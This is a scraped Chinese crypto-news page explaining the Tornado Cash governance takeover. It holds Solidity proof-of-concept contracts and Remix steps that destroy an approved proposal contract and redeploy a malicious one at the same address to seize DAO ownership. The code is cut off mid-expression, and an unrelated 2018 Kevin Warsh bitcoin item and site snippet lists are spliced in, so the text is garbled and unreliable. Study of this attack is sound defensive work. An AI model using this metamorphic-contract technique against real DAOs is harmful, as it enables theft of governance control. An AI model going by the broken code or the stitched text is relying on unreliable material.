大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado
address public owner = msg
function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId]; require(proposal
}contract Proposal { event Log(string message); function executeProposal() external { emit Log("Excuted code approved by DAO"); } function emergencyStop() external { selfdestruct(payable(address(0))); }}contract Attack { event Log(string message); address public owner; function executeProposal() external { emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker owner = msg
}contract DeployerDeployer { event Log(address addr); function deploy() external { bytes32 salt = keccak256(abi
}contract Deployer { event Log(address addr); function deployProposal() external { address addr = address(new Proposal()); emit Log(addr); } function deployAttack() external { address addr = address(new Attack()); emit Log(addr); } function kill() external { selfdestruct(payable(address(0))); }}大家可以使用该代码自己在 Remix 中演练一下。
前美联储理事Kevin Warsh:从美国经济政策角度解析比特币价格波动: 前美联储理事、斯坦福大学胡佛研究所杰出访问学者Kevin Warsh今日撰文,从政府经济政策角度解读了比特币价格波动的原因。对于2017年BTC价格的狂飙,Warsh认为:1.特朗普上台后推出的减税等宽松政策持续刺激美国经济增长,继而带来的通货膨胀预期促使美国加息进度超预期,比特币成为规避法币贬值的避风港;2.特朗普政府贸易保护政策致使美元在2017年贬值12%,投资者寻求比特币规避贬值;3.据去年10月、11月调查,美国民众对政府的信任度下降14个百分点达到33%,而美元正是建立在公众对政府信任的基础上。而对于今年以来比特币价格的大幅波动,是因为投资者正在调整对政府政策的预期,新任美联储主席也在重新考虑如何更好地实施货币政策,同时也在考虑推出自己的加密货币。[2018/3/8]
首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用 Deployer.deployProposal() 部署 Proposal 。
拿到 Proposal 提案合约地址后, 向 DAO 发起提案。
分别调用 Deployer.kill 和 Proposal.emergencyStop 销毁掉 Deployer 和 Proposal
再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署 Attack , Attack 将和之前的 Proposal 一致。
执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。
区块律动BlockBeats
曼昆区块链法律
Foresight News
GWEI Research
吴说区块链
西柚yoga
ETH中文
金色早8点
金色财经 子木
ABCDE
0xAyA
在加密世界中,GameFi 正经历低谷,人们对其关注度有所减少。然而,近期全链游戏的概念开始引起更多关注和讨论,似乎带来了一丝新生.
1900/1/1 0:00:00根据 Numen 链上监控,2023年6月1日10点7分55秒(UTC+8),Cellframe Network(/img/202364115846/0.jpg" />2.需要注意的是.
1900/1/1 0:00:00作者:SevaFTW,加密KOL;翻译:金色财经xiaozou你错过了Ordinals,又错过了BRC-20,但千万不要错过下一个比特币大事件.
1900/1/1 0:00:00出品:深潮 TechFlow 撰文:0xmin如果要问加密货币领域最厉害的VC有哪些,Paradigm 一定榜上有名,熊市All in 比特币,深度孵化Uniswap一战成名.
1900/1/1 0:00:00作者:TRISTAN GREENE,Cointelegraph;编译:松雪,金色财经来自澳大利亚和美国的大学的一组研究人员与量子技术公司 BTQ 进行合作,最近发表了一项研究.
1900/1/1 0:00:00来源:福布斯编译:比推BitpushNews Mary Liu全球最大的加密货币交易所币安(Binance)正在努力保住资产.
1900/1/1 0:00:00
月亮链